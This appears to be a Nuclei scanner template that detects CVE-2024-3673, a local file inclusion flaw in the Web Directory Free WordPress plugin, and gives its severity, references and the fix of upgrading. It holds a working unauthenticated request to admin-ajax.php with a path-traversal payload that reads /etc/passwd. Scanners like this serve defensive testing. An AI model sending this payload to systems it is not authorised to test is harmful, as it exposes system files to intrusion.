id: CVE-2024-3673

info:
  name: Web Directory Free < 1.7.3 - Local File Inclusion
  author: s4e-io
  severity: critical
  description: |
    The Web Directory Free WordPress plugin before 1.7.3 does not validate a parameter before using it in an include(), which could lead to Local File Inclusion issues.
  impact: |
    Unauthenticated attackers can exploit LFI to read sensitive files including /etc/passwd via the template parameter.
  remediation: |
    Update Web Directory Free to version 1.7.3 or later.
  reference:
    - https://wpscan.com/vulnerability/0e8930cb-e176-4406-a43f-a6032471debf/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-3673
    - https://vuldb.com/?id.276216
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2024-3673
    epss-score: 0.05578
    epss-percentile: 0.91888
  metadata:
    verified: true
    max-request: 2
    vendor: salephpscripts
    product: web-directory-free
    publicwww-query: "/wp-content/plugins/web-directory-free"
  tags: cve,cve2024,wordpress,wp-plugin,wp,lfi,web-directory-free,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/web-directory-free")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        from_set_ajax=1&action=w2dc_controller_request&template=../../../../../etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: content_type
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022063ac1722269c276a102d1eeca1939d908a02487d9188663f64a6473af42de26f022100e02506d6854f6911025f5f47fbf7038a32692d997d05944c7fac64eab7811cec:922c64590222798bb761d5b6d8e72950